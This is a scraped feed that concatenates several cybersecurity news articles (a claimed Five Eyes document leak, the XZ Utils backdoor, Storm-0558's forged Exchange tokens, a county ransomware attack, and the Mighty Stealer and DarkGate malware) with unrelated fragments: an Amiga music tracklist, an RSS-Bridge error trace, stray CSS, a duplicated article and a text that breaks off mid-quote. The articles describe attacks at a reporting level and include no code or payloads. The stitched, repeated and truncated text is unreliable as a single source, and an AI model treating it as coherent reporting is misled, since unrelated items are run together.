Hackers Claiming Breach of Five Eyes Intelligence Group (FVEY) Documents

A group of hackers has announced the release of sensitive documents purportedly belonging to the Five Eyes Intelligence Group (FVEY), a prominent intelligence alliance comprising Australia, Canada, New Zealand, the United Kingdom, and the United States.

The United States Department of State has launched an investigation into a possible cyber attack after confidential documents, which were reportedly obtained by a malicious actor, were leaked from a government contractor.

Breach Announcement on BreachForums

The announcement was made on a forum known as BreachForums, where a user with the handle “IntelBroker” posted a message to the community.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

The post, dated April 2, 2024, claims that the data was obtained by infiltrating Acuity Inc, a company alleged to work closely with the US government and its allies.

According to a recent tweet by HackManac, the alleged security breach at Acuity Inc has resulted in the exposure of highly sensitive intelligence documents belonging to the Five Eyes Intelligence Group (FVEY).

[

#DataBreach

](https://twitter.com/hashtag/DataBreach?src=hash&ref_src=twsrc%5Etfw)

Alert ⚠️

🇺🇸

[

#USA

](https://twitter.com/hashtag/USA?src=hash&ref_src=twsrc%5Etfw)

: Alleged Acuity Inc breach leads to leak of sensitive Five Eyes Intelligence Group (FVEY) documents.

The threat actor group consisting of IntelBroker, Sanggiero, and EnergyWeaponUser claims to have breached Acuity Inc, a federal tech consulting firm,…

[

pic.twitter.com/qGV8IUmkT7

](https://t.co/qGV8IUmkT7)

— HackManac (@H4ckManac)

[

April 3, 2024

](https://twitter.com/H4ckManac/status/1775402497768628236?ref_src=twsrc%5Etfw)

The hackers assert that the breach resulted in acquiring full names, emails, office numbers, personal cell numbers, and government, military, and Pentagon email addresses.

⚠️

[

#BREAKING

](https://twitter.com/hashtag/BREAKING?src=hash&ref_src=twsrc%5Etfw)

⚠️Allegedly, notorious threat actor IntelBroker, has released National Security Documents and data. Per IntelBroker below..

[

#Clearnet

](https://twitter.com/hashtag/Clearnet?src=hash&ref_src=twsrc%5Etfw)

[

#DarkWebInformer

](https://twitter.com/hashtag/DarkWebInformer?src=hash&ref_src=twsrc%5Etfw)

[

#Cyberattack

](https://twitter.com/hashtag/Cyberattack?src=hash&ref_src=twsrc%5Etfw)

[

#Cybercrime

](https://twitter.com/hashtag/Cybercrime?src=hash&ref_src=twsrc%5Etfw)

[

#Infosec

](https://twitter.com/hashtag/Infosec?src=hash&ref_src=twsrc%5Etfw)

[

#CTI

](https://twitter.com/hashtag/CTI?src=hash&ref_src=twsrc%5Etfw)

[

#NSA

](https://twitter.com/hashtag/NSA?src=hash&ref_src=twsrc%5Etfw)

Documents belonging to the Five Eyes Intelligence..

Compromised Data:…

[

pic.twitter.com/I5n41utQN9

](https://t.co/I5n41utQN9)

— Dark Web Informer (@DarkWebInformer)

[

April 2, 2024

](https://twitter.com/DarkWebInformer/status/1775295354910466200?ref_src=twsrc%5Etfw)

The compromised data also includes classified information and communications between the Five Eyes countries and their allies.

Implications of the Leak

If confirmed, the leak could have significant implications for national security and the operational integrity of the intelligence-sharing network.

The Five Eyes alliance is known for its collaborative intelligence gathering and analysis efforts, playing a pivotal role in global security operations.

At the time of reporting, there has been no official statement from any of the Five Eyes member countries or Acuity Inc. regarding the authenticity of the leaked documents or the extent of the breach.

The silence from official channels has led to speculation and concern among cybersecurity experts and government officials alike.

Cybersecurity agencies are likely to conduct thorough investigations to ascertain the validity of the claims made by the hackers.

The incident underscores the persistent threat cybercriminals pose to national and international security.

`Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - Download Free Guide`

The post Hackers Claiming Breach of Five Eyes Intelligence Group (FVEY) Documents appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Aembit Selected as Finalist for RSA Conference 2024 Innovation Sandbox Contest

The Leading Company for Securing Access Between Workloads Recognized for the Aembit Workload IAM Platform

Aembit, the Workload Identity and Access Management (IAM) Company, has been named one of the Top 10 Finalists for the RSA Conference™ 2024 Innovation Sandbox contest for its platform that manages and secures access between critical software resources, like applications and services.

Aembit will present its technology to a panel of renowned industry judges and a live in-person audience on May 6 at RSA Conference 2024 at the Moscone Center in San Francisco.

Since 2005, the RSAC Innovation Sandbox contest has served as a platform for the most promising young cybersecurity companies to showcase their groundbreaking technologies and compete for the title of “Most Innovative Startup.”

The competition is widely recognized as a catapult for success as the Top 10 Finalists have collectively celebrated more than 80 acquisitions and received $13.5 billion in investments over the last 18 years. Aembit will have three minutes to pitch the panel of judges before a question-and-answer round.

“The submissions for this year’s RSA Conference Innovation Sandbox contest were both dynamic and inspiring. Along with the rest of our entrepreneurial audience, I am excited to see these ideas come to life on stage,” said Linda Gray Martin, senior vice president of RSA Conference. “The evolution of global cyber threats is constant and there’s no better place to look for solutions and to help solve these challenges than in our own community.”

With the rapid expansion of automated software, cloud services, and APIs, enterprises are being met with an exploding number of workloads across their IT environments. Reflect on the now-outdated practice of jotting down user credentials on sticky notes. Similarly, the current method of securing interactions between workloads typically involves the use of static, long-lived credentials, which are prone to theft and often embedded directly within code.

This approach not only introduces security vulnerabilities but also complicates management and impedes prompt response during security incidents and compliance audits. Aembit shifts the model so enterprises can focus on managing access, instead of managing secrets.

“Aembit automates and secures the entire workload-to-workload access workflow, from discovery, to enforcement, to audit – at scale,” said David Goldschlag, co-founder and CEO of Aembit.

“Instead of building another dashboard showing you problems due to secrets and keys, we proactively fix the root cause of these challenges by systematically improving the way workloads are authorized access to your most sensitive resources, without code changes.

You can think of us as Okta (or Azure AD), but between workloads instead of between users and services. The RSA Conference presents the ideal platform for us to demonstrate the significance and impact of our solution to the global security community.”

The RSAC Innovation Sandbox contest kicks off at 10:50 a.m. PT on May 6, and winners will be announced at approximately 1:30 p.m. the same day. The panel of renowned expert judges includes Asheem Chandna, partner at Greylock; Dorit Dor, chief technology officer at Check Point Software Technologies; Niloofar Howe, senior operating partner at Energy Impact Partners; Paul Kocher, independent researcher; and Nasrin Rezai, SVP & CISO at Verizon. Hugh Thompson, RSAC executive chairman and program committee chair of RSA Conference, will return to host the contest.

For more information regarding RSA Conference 2024, taking place at the Moscone Center in San Francisco from May 6 to 9, users can visit https://www.rsaconference.com/usa.

To learn more about the Aembit Workload IAM Platform.

About Aembit

Aembit is the Workload Identity and Access Management platform that secures access between workloads across clouds, SaaS, and data centers. With Aembit’s identity control plane, DevSecOps can fully automate secretless, policy-based, and Zero Trust workload access. For more information, visit www.aembit.io and follow us on LinkedIn.

About RSA Conference

RSA Conference™ is the premier series of global events and year-round learning for the cybersecurity community. RSAC is where the security industry converges to discuss current and future concerns and have access to the experts, unbiased content, and ideas that help enable individuals and companies advance their cybersecurity posture and build stronger and smarter teams.

Both in-person and online, RSAC brings the cybersecurity industry together and empowers the collective “we” to stand against cyberthreats around the world. RSAC is the ultimate marketplace for the latest technologies and hands-on educational opportunities that help industry professionals discover how to make their companies more secure while showcasing the most enterprising, influential, and thought-provoking thinkers and leaders in cybersecurity today. For the most up-to-date news about the cybersecurity industry visit www.rsaconference.com. Where the world talks security.

Contact

CMO

Apurva Dave

Aembit

apurva@aembit.io

The post Aembit Selected as Finalist for RSA Conference 2024 Innovation Sandbox Contest appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

New XZ Utils Backdoor Free Scanner to Detect Malicious Executables

A critical vulnerability has been discovered in XZ Utils, a widely used data compression tool across Unix-like operating systems, including Linux.

This vulnerability, identified as CVE-2024-3094, involves a backdoor that could potentially allow unauthorized remote access, posing a significant threat to software supply chain security.

Zero detection from VirusTotal

The Discovery of CVE-2024-3094

The initial alarm was raised by Andres Freund, who noticed unusual activity in the XZ Utils project. Versions 5.6.0 and 5.6.1 of XZ Utils were found to be compromised.

Shortly after Freund’s warning, the United States government’s Cybersecurity and Infrastructure Security Agency (CISA) and the Open Source Security Foundation (OpenSSF) issued alerts about the critical nature of this backdoor, emphasizing the urgency of addressing this vulnerability due to its potential impact on OpenSSH security.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

The revelation of this backdoor is particularly alarming because it represents a nightmare scenario for software supply chain security.

XZ Utils is integral to embedded systems and firmware development across various ecosystems, with the Linux ecosystem being a primary target due to its role in powering modern cloud infrastructure.

The Response and Mitigation Efforts

In response to the discovery of CVE-2024-3094, the community acted swiftly.

Many Linux distributions impacted by the vulnerability have rolled back to a known safe version of XZ Utils, demonstrating the effectiveness of industry-wide, community-driven coordination.

However, the challenge remains in quickly detecting and deactivating deployed backdoored versions in the field.

Traditional detection tools, which often rely on simple version checks, hash-based detection, or YARA rules, have proven inadequate.

These methods can lead to alert fatigue and false positives, overwhelming security teams.

Recognizing the limitations of existing detection methods, the Binary Research Team embarked on a mission to develop a more practical approach to identify the backdoored binaries.

exported by the payload object file

Their investigation revealed the complexity of the XZ Utils backdoor, believed to be part of a sophisticated, state-sponsored operation with multi-year planning.

An essential technique employed by the backdoor involves the GNU Indirect Function (ifunc) attribute, which allows for runtime resolution of indirect function calls.

The backdoor intercepts execution and modifies ifunc calls to insert malicious code.

Binary Intelligence technology in action.

This static analysis method can generically detect tampering of control flow graph transitions, significantly reducing the false positive rate.

The discovery of the XZ Utils backdoor underscores the critical importance of software supply chain security.

Through the collaborative efforts of the security community and the innovative solutions provided by teams like Binary, the industry is better equipped to defend against these sophisticated threats.

As the landscape of cyber threats continues to evolve, such proactive measures and tools will be indispensable in safeguarding our digital infrastructure.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post New XZ Utils Backdoor Free Scanner to Detect Malicious Executables appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Microsoft’s Exchange Server Hack: Key Rotation Flaw Triggers Breach

Storm-0558, a cyberespionage group affiliated with the People’s Republic of China, has reportedly compromised Microsoft Exchange mailboxes of 22 organizations and over 500 individuals between May and June 2023.

This was done by using authentication tokens of accounts that were signed by a Key held by Microsoft in 2016.

This key was used for secure authentication into remote systems. However, this key was possessed by the threat actor, which provided several permissions to access any information or systems within that key’s domain.

**Is Your Network Under Attack? - Read CISO’s Guide to Avoiding the Next Breach - [Download Free Guide](https://www.perimeter81.com/whitepapers/ciso-avoid-breach?utm_source=gbhackers&utm_medium=affiliate&utm_campaign=top_articles_gbchakers_cisos_wp&a_aid=2428)**

Additionally, a single key can have enormous power, which, combined with a flaw in Microsoft’s authentication system, resulted in the threat actor gaining full access to any Exchange online account anywhere in the world.

Moreover, Microsoft is still investigating how Storm-0558 got its hands on this key.

The accounts compromised using this attack included

• Senior United States government representatives working on national security matters

• Email accounts of Commerce Secretary Gina Raimondo,

• United States Ambassador to the People’s Republic of China R. Nicholas Burns and

• Congressman Don Bacon.

Microsoft’s Exchange Server Hack

According to the CSRB reports, during the time the threat actor had access to these sensitive email accounts, they downloaded over 60,000 emails from the State Department.

Attack vector of Storm-0558 (Source: CISA)

Moreover, the first victim of this intrusion was the State Department, which was on June 15, 2023, when the SOC team detected anomalies in access to their mail systems.

Following this, the next day, there were several security alerts for which they contacted Microsoft.

10-Day Investigations From Microsoft

Microsoft initiated an investigation for the next 10 days and confirmed that the threat actor Storm-0558 had gotten their hands on certain emails through their Outlook Web Access (OWA).

Further, Microsoft also identified 21 different organizations and 500+ users that were impacted by the attack. The impact was further noted by the U.S. government agencies.

In addition to this, Microsoft also found that the threat actor used the OWA for accessing emails directly using tokens which authenticated Storm-0558 as a valid user.

This also specified that these kinds of tokens must be associated with Microsoft’s identity systems only, but unfortunately, they were not.

Furthermore, the tokens used by the threat actor had digital signatures with a Microsoft Services Account (MSA) cryptographic key that dated back to 2016.

This key was originally intended to be retired by March 2021, providing more insights on the attack.

The Revealing Point

Microsoft initially concluded that the threat actor had forged tokens for accessing these Microsoft Exchange online accounts from affected individuals.

However, after developing some hypotheses they found a flaw in the token validation login used by Microsoft Exchange which could allow any consumer key to access enterprise Exchange accounts if the accounts did not have a code to reject consumer key.

However, it was still not evident enough to prove that the threat actor had obtained and used the 2016 MSA key to compromise the accounts.

By that time, Microsoft recalled an attack performed by the same threat actor in 2021 in which they accessed several documents that were stored in SharePoint as they were looking for information on Azure service management and Identity-related management.

The final stages of investigations revealed some major things: Microsoft had been using manual key rotation mechanisms on enterprise systems and had completely stopped the rotation mechanism after they faced a major outage on one of these activities in 2021.

This allowed the threat actor to use these consumer keys to forge authentication tokens to access consumer email systems.

However, another previously unknown flaw was combined with this issue, potentially compromising sensitive email accounts and organizations.

The post Microsoft’s Exchange Server Hack: Key Rotation Flaw Triggers Breach appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

#Amiga #Music: TwentyTwentyFour #Compilation #1 - #off1k

G'day peeps, been a little while since the last proper compilation and so begins 2024 of Amiga goodness. This compilation consists of #tunes released at #Gerp24 and #Revision24 #Demo #Parties from the last 2 months or so.
Some killer #tracks among this lot so hope you all enjoy :)

Recorded from a Real Amiga 1200 (2MB Chip, 32MB Fast, 030@40Mhz, 16GB CFHD)

TRACKLIST
01 - [00:00] LMan - Ode To Amiga
02 - [02:43] Interphace - Peace Droid
03 - [05:56] Jogeir Liljedahl - Roguecraft
04 - [10:02] SoDa7 - Coffee at Morning
05 - [13:10] JosSs^Mygg^Bonefish - Dan Dan Dada
06 - [17:18] Kefka - The Återsmällare
07 - [19:37] Facet - NewSong
08 - [21:11] Laamaa - Saint Lager
09 - [23:34] AceMan - Yoru no Koe
10 - [27:26] Triace - Groove Operator
11 - [30:49] H0ffman^Daytripper - Surveillance
12 - [34:19] Virtua Point Zero - Can Your AI Do This
13 - [37:52] Tecon - Spiceballs
14 - [41:18] Ma2e^No-XS^Dya - Brink It Back To Me
15 - [44:48] Teo - The Flow
16 - [48:04] Subi - Space Is The Place

The Amiga is a series of #computers released by C=ommodore from 1985 to 1993, all Amigas used the same sound chip, an 8bit, 4channel, upto 28khz PCM called "Paula".

HARDWARE USED:
#Amiga1200, #Behringer DJX750 Mixer, Behringer HD400 Hum Eliminator, Sony 14" PVM, Various RCA and TRS cables, Hydra Mini Scart Switch, Various Scart and BNC cables.
A Phone to record the footage (wish it had 50fps).
**Stereo joining is done with hardware (RCA & TRS cables, Mixer)
Approximate 15% Stereo Separation.

SOFTWARE USED:
#Protracker 2.3F (Amiga)
#Audacity 3.1.3 - audio recording, minor cable noise reduction, volume leveling, some fade outs.
#Camtasia 2021 - video editing, song info.
#Handbrake 1.5.1 - video compression.

https://www.youtube.com/watch?v=RCbYLjWDBf0
#music #musique

Jackson County Missouri Ransomware Attack Impacts IT Systems

Jackson County, Missouri, has become the latest victim of a ransomware attack, which has caused substantial disruptions within its Information Technology (IT) systems.

This attack has highlighted the vulnerabilities in digital infrastructures and the cascading effects such disruptions can have on public services and operations.

The first signs of the cyberattack emerged as operational inconsistencies across Jackson County’s digital infrastructure.

Specific systems were found to be inoperative, while others continued to function normally.

The affected systems are critical to the county’s daily operations, including tax payments and online services for property searches, marriage licenses, and inmate searches.

Consequently, the Assessment, Collection, and Recorder of Deeds offices at all counties have been forced to close until further notice, significantly impacting residents and county operations.

Services Unaffected

It is noteworthy that the Kansas City Board of Elections and Jackson County Board of Elections have not been impacted by this system outage.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

This detail is crucial, especially during electoral activities, ensuring the democratic process remains uninterrupted.

Response and Actions Taken

Upon detecting the disruptions, Jackson County promptly notified law enforcement and engaged IT security contractors to assist in the investigation and remediation efforts.

The county has emphasized that the integrity of its digital network and the confidentiality of resident data remain top priorities.

To date, no evidence suggests that any data has been compromised.

The investigation is in its early stages, with cybersecurity partners working closely with the county to diagnose the issue.

While ransomware is considered a potential cause, comprehensive analyses are underway to confirm the exact nature of the disruption.

Immediate measures have been taken to secure the systems against further compromise.

The county’s IT teams are working tirelessly to restore total operational capacity to the impacted services.

Community Impact and Ongoing Efforts

The closure of critical county offices has undeniably affected residents, who rely on these services for various legal and administrative needs.

Jackson County has acknowledged the inconvenience caused by these closures and expressed appreciation for the community’s patience and understanding.

As the situation unfolds, Jackson County is committed to providing timely updates and ensuring transparency with its residents.

The focus remains on swiftly resolving the issue and implementing measures to prevent future attacks.

This incident is a stark reminder of the ever-present threat of cyberattacks and the importance of robust cybersecurity measures.

As Jackson County navigates this challenging time, the lessons learned will undoubtedly strengthen its defenses and preparedness for similar incidents in the future.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Jackson County Missouri Ransomware Attack Impacts IT Systems appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

RSS-Bridge

See https://curl.haxx.se/libcurl/c/libcurl-errors.html for description of the curl error code.

Details

Type: HttpException
Code: 0
Message: cURL error Could not resolve host: api.arte.tv: 6 (https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://api.arte.tv/api/opa/v3/videos?limit=15&language=de
File: lib/http.php
Line: 154

Trace

#0 index.php(72): RssBridge->main()
#1 lib/RssBridge.php(103): DisplayAction->execute()
#2 actions/DisplayAction.php(68): DisplayAction->createResponse()
#3 actions/DisplayAction.php(117): Arte7Bridge->collectData()
#4 bridges/Arte7Bridge.php(128): getContents()
#5 lib/contents.php(83): CurlHttpClient->request()
#6 lib/http.php(154)

Context

Query: action=display&bridge=Arte7&context=Category&lang=de&cat=&sort_by=&sort_direction=DESC&format=Mrss
Version: 2024-02-02
OS: Linux
PHP: 7.4.33

Go back[https://rss.nixnet.services/url]
[url=https://github.com/RSS-Bridge/rss-bridge/issues?q=is%3Aissue+is%3Aopen+Arte+%2B7]Find similar bugsCreate GitHub Issue
No maintainer

Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies

A new menace has emerged that targets personal information with alarming precision.

Dubbed the “Mighty Stealer,” this malicious software is designed to infiltrate devices and extract a wide range of sensitive data.

The Mighty Stealer is a sophisticated malware that boasts an easy-to-use graphical user interface (GUI), allowing cybercriminals to deploy it with minimal effort.

The software’s capabilities are extensive, including the theft of cookies, passwords, and wallet information.

It can also capture Discord tokens, Telegram profiles, and webcam pictures without the user’s consent.

The interface of the Mighty Stealer, as seen in the provided images, is sleek and user-friendly, disguising its nefarious purposes behind a facade of legitimacy.

The software’s logo, featuring a stylized bird, is a deceptive symbol of the power and control it grants to its unauthorized users.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

According to a recent tweet by TweetMon, a threat actor has announced the release of a new tool called Mighty Stealer.

🚨 Mighty Stealer Announced

A threat actor announces Mighty Stealer. Stealer captures cookies, passwords, wallets, discord tokens, telegram profiles, webcam pictures, games, user/pc information, desktop snaps, etc.

[

#MightyStealer

](https://twitter.com/hashtag/MightyStealer?src=hash&ref_src=twsrc%5Etfw)

[

#Malware

](https://twitter.com/hashtag/Malware?src=hash&ref_src=twsrc%5Etfw)

[

#Darkweb

](https://twitter.com/hashtag/Darkweb?src=hash&ref_src=twsrc%5Etfw)

[

#ThreatIntelligence

](https://twitter.com/hashtag/ThreatIntelligence?src=hash&ref_src=twsrc%5Etfw)

[

pic.twitter.com/1qVdhMO0UF

](https://t.co/1qVdhMO0UF)

— ThreatMon (@MonThreat)

[

April 2, 2024

](https://twitter.com/MonThreat/status/1775149045767385371?ref_src=twsrc%5Etfw)

Stealth and Evasion Techniques

One of the most concerning aspects of the Mighty Stealer is its ability to evade detection.

It includes features that prevent it from being discovered by antivirus programs and can operate undetected in virtual machine environments.

The malware can also hide its presence on the infected device, making it even harder for users to realize they’ve been compromised.

The Risks of Mighty Stealer

The risks associated with the Mighty Stealer are significant.

The malware can bypass login procedures and access online accounts by capturing cookies. Striking passwords and wallet information can lead to financial loss and identity theft.

The unauthorized access to webcam feeds poses a severe privacy violation, potentially leading to blackmail and other forms of exploitation.

To safeguard against threats like the Mighty Stealer, it is crucial to maintain up-to-date antivirus software and to be cautious when downloading and installing new programs.

Users should also regularly change their passwords and enable two-factor authentication where possible to add an extra layer of security.

The emergence of the Mighty Stealer malware is a stark reminder of the importance of cybersecurity vigilance.

With its array of stealthy data theft capabilities, it represents a significant threat to personal privacy and security.

Users must proactively protect their devices and personal information from such invasive software.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies

A new menace has emerged that targets personal information with alarming precision.

Dubbed the “Mighty Stealer,” this malicious software is designed to infiltrate devices and extract a wide range of sensitive data.

The Mighty Stealer is a sophisticated malware that boasts an easy-to-use graphical user interface (GUI), allowing cybercriminals to deploy it with minimal effort.

The software’s capabilities are extensive, including the theft of cookies, passwords, and wallet information.

It can also capture Discord tokens, Telegram profiles, and webcam pictures without the user’s consent.

The interface of the Mighty Stealer, as seen in the provided images, is sleek and user-friendly, disguising its nefarious purposes behind a facade of legitimacy.

The software’s logo, featuring a stylized bird, is a deceptive symbol of the power and control it grants to its unauthorized users.

Run Free ThreatScan on Your Mailbox

AI-Powered Protection for Business Email Security

Trustifi’s Advanced threat protection prevents the widest spectrum of sophisticated attacks before they reach a user’s mailbox. Try Trustifi Free Threat Scan with Sophisticated AI-Powered Email Protection .

Run Free Threat Scan

According to a recent tweet by TweetMon, a threat actor has announced the release of a new tool called Mighty Stealer.

🚨 Mighty Stealer Announced

A threat actor announces Mighty Stealer. Stealer captures cookies, passwords, wallets, discord tokens, telegram profiles, webcam pictures, games, user/pc information, desktop snaps, etc.

[

#MightyStealer

](https://twitter.com/hashtag/MightyStealer?src=hash&ref_src=twsrc%5Etfw)

[

#Malware

](https://twitter.com/hashtag/Malware?src=hash&ref_src=twsrc%5Etfw)

[

#Darkweb

](https://twitter.com/hashtag/Darkweb?src=hash&ref_src=twsrc%5Etfw)

[

#ThreatIntelligence

](https://twitter.com/hashtag/ThreatIntelligence?src=hash&ref_src=twsrc%5Etfw)

[

pic.twitter.com/1qVdhMO0UF

](https://t.co/1qVdhMO0UF)

— ThreatMon (@MonThreat)

[

April 2, 2024

](https://twitter.com/MonThreat/status/1775149045767385371?ref_src=twsrc%5Etfw)

Stealth and Evasion Techniques

One of the most concerning aspects of the Mighty Stealer is its ability to evade detection.

It includes features that prevent it from being discovered by antivirus programs and can operate undetected in virtual machine environments.

The malware can also hide its presence on the infected device, making it even harder for users to realize they’ve been compromised.

The Risks of Mighty Stealer

The risks associated with the Mighty Stealer are significant.

The malware can bypass login procedures and access online accounts by capturing cookies. Striking passwords and wallet information can lead to financial loss and identity theft.

The unauthorized access to webcam feeds poses a severe privacy violation, potentially leading to blackmail and other forms of exploitation.

To safeguard against threats like the Mighty Stealer, it is crucial to maintain up-to-date antivirus software and to be cautious when downloading and installing new programs.

Users should also regularly change their passwords and enable two-factor authentication where possible to add an extra layer of security.

The emergence of the Mighty Stealer malware is a stark reminder of the importance of cybersecurity vigilance.

With its array of stealthy data theft capabilities, it represents a significant threat to personal privacy and security.

Users must proactively protect their devices and personal information from such invasive software.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post Beware of New Mighty Stealer That Takes Webcam Pictures & Capture Cookies appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams

DarkGate loader delivery surged after the Qakbot takedown, with financially motivated actors like TA577 and ransomware groups (BianLian, Black Basta) using it to target financial institutions (US, Europe) for double extortion.

It establishes an initial foothold and deploys info-stealers, ransomware, and remote access tools to maximize data exfiltration and extortion gains by utilizing legitimate channels (DoubleClick ads, cloud storage) and phishing emails for distribution.

Overview of DarkGate version 5 activity

Similarities with IcedID delivery methods suggest that threat actors may be cooperating or sharing their tradecraft.

@import url(‘https://fonts.googleapis.com/css2?family=Poppins&display=swap’); @import url(‘https://fonts.googleapis.com/css2?family=Poppins&family=Roboto&display=swap’); { margin: 0; padding: 0; text-decoration: none; } .container{ font-family: roboto, sans-serif; width: 90%; border: 1px solid lightgrey; padding: 20px; background: linear-gradient(2deg,#E0EAF1 100%,#BBD2E0 100%); margin: 20px auto ; border-radius: 40px 10px; box-shadow: 5px 5px 5px #e2ebff; } .container:hover{ box-shadow: 10px 10px 5px #e2ebff; } .container .title{ color: #015689; font-size: 22px; font-weight: bolder; } .container .title{ text-shadow: 1px 1px 1px lightgrey; } .container .title:after { width: 50px; height: 2px; content: ‘ ‘; position: absolute; background-color: #015689; margin: 20px 0; } .container h2{ line-height: 40px; margin: 5px 3px; font-weight: bolder; } .container a{ color: #170d51; } .container p{ font-size: 18px; line-height: 30px; margin: 10px 0; } .container button{ padding: 15px; background-color: #4469f5; border-radius: 10px; border: none; background-color: #00456e ; font-size: 16px; font-weight: bold; margin-top: 5px; } .container button:hover{ box-shadow: 1px 1px 15px #015689; transition: all 0.2S linear; } .container button a{ color: white; } hr{ / display: none; / } .listWrapper { padding-left: 4rem; /*list-style-type: none;/ } .listWrapper li { /padding-left: 2rem; background-image: url(star.svg);/ background-position: 0 0; line-height: 2rem; background-size: 1.6rem 1.6rem; background-repeat: no-repeat; }

Download Free CISO’s Guide to Avoiding the Next Breach

Are you from The Team of SOC, Network Security, or Security Manager or CSO? Download Perimeter’s Guide to how cloud-based, converged network security improves security and reduces TCO.

• Understand the importance of a zero trust strategy

• Complete Network security Checklist

• See why relying on a legacy VPN is no longer a viable security strategy

• Get suggestions on how to present the move to a cloud-based network security solution

• Explore the advantages of converged network security over legacy approaches

• Discover the tools and technologies that maximize network security

Adapt to the changing threat landscape effortlessly with Perimeter 81’s cloud-based, unified network security platform.

Download Perimeter 81 Free PDF Guide </html

DarkGate is a malware-as-a-service advertised in June 2023 that offers remote access, data theft, and privilege escalation by using multiple techniques to evade, including a custom crypter, polymorphism, and anti-VM.

Persona RastaFarEye is advertising DarkGate on a cybercrime forum.

It also utilizes LOLBAS tools to download a malicious AutoIt script that decrypts the DarkGate payload, injects it into a process, and establishes persistence through registry keys and a rootkit module.

*DarkGate infection chain through PDF lure. *

Attackers primarily target financial institutions like BDK, a major German bank, using phishing emails with lures relevant to the target’s industry and delivering the DarkGate payload through embedded links in PDF attachments.

*The delivered malicious PDF attachment targeted the BDK. *

The links redirect victims to download pages hosted on compromised websites.

To evade detection, DarkGate operators have incorporated innovative techniques like abusing DNS TXT records to execute malicious Windows commands that download and install the malware.

* Malware delivery similarities between DarkGate and IcedID.*

EclecticIQ analysts compared DarkGate and IcedID malware, finding shared tactics like obfuscated strings, using PING.exe to check internet connectivity, CURL.exe for downloading payloads, and decoy PDF documents.

They differed in execution tools (DarkGate: Cscript.exe, IcedID: Rundll32.exe) and payload types (DarkGate: VBS script, IcedID: disguised DLL).

Showing the example of DoubleClick Ad service abuse.

For DarkGate delivery, attackers abused open redirects in Google’s DoubleClick ads with emails containing links disguised as invoices.

Since January 2024, DarkGate has shifted to CAB and MSI formats, likely to evade detection.

DarkGate version 6.1.6 employs DLL side-loading for evasion, where a malicious DLL is loaded into legitimate applications (e.g., VLC, iTunesHelper) through a compromised MSI installer.

Dropped DarkGate payloads

The payload then decrypts itself using a key within a fake sqlite3.dll and drops a script into C:\temp, while decrypting again using a separate key and launching the final DarkGate payload.

Decrypted configuration reveals the command-and-control server.

The version also features a new configuration decryption routine using XOR encryption to hide C2 server information and other operational parameters, making it more difficult for signature-based detection.

DarkGate is a Malware-as-a-Service (MaaS) that steals information like usernames, CPU information, and anti-virus information from the victim device after gaining an initial foothold.

Decrypted C2 activity showing the version of Darkgate.

It then uses Living Off the Land Binaries (LOLBAS) like wscript.exe and cscript.exe to execute a VBS script.

v

Network traffic analysis can be used to detect suspicious patterns like downloads from unusual domains or suspicious Curl.exe activity and YARA rules can also be used to detect the final payload on the infected device.

The IOCs include suspicious user agent strings, command and control (C2) server domains, payload downloader URLs with malicious zip files, and multiple file hashes, which can be used to identify infected systems, block malicious traffic, and improve threat detection.

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

The post DarkGate Malware Abusing Cloud Storage & SEO Following Delivery Over Teams appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
posted by pod_feeder

Authentic8 launches Silo Shield Program to Protect High-Risk Communities in Partnership with CISA

Authentic8, provider of the leading OSINT research platform Silo for Research, today launched their Silo Shield Program to enhance online security for high-risk communities.

Also today, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) launched a webpage listing free tools and services to strengthen defenses of high-risk communities, including Authentic8’s new Silo Shield Program.

These “high-risk” communities — non-governmental organizations, journalists, and academics — face digital risks that are existential threats to their missions, as they are targeted by some of the world’s most capable advanced persistent threats (APTs).

The new Silo Shield Program enables eligible persons to apply for access to Authentic8’s Silo for Research platform, which provides a secure solution to collect publicly available information.

Securely collecting web-based information is essential for these groups to carry out research, investigations, and advocacy.

“In an era where adversaries threaten those striving for social change and transparency, Authentic8 is proud to launch the Silo Shield Program.

This pioneering initiative offers robust online protection for high-risk communities at the forefront of pushing boundaries and challenging the status quo.

